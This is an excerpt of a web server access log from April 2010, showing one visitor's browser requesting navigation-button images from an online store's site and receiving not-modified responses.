131.158.223.4 - - [07/Apr/2010:07:35:54 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
131.158.223.4 - - [07/Apr/2010:07:35:54 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
131.158.223.4 - - [07/Apr/2010:07:35:54 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
131.158.223.4 - - [07/Apr/2010:07:35:54 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
131.158.223.4 - - [07/Apr/2010:07:35:54 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
131.158.223.4 - - [07/Apr/2010:07:35:54 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
131.158.223.4 - - [07/Apr/2010:07:35:54 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
131.158.223.4 - - [07/Apr/2010:07:35:55 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
131.158.223.4 - - [07/Apr/2010:07:35:55 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
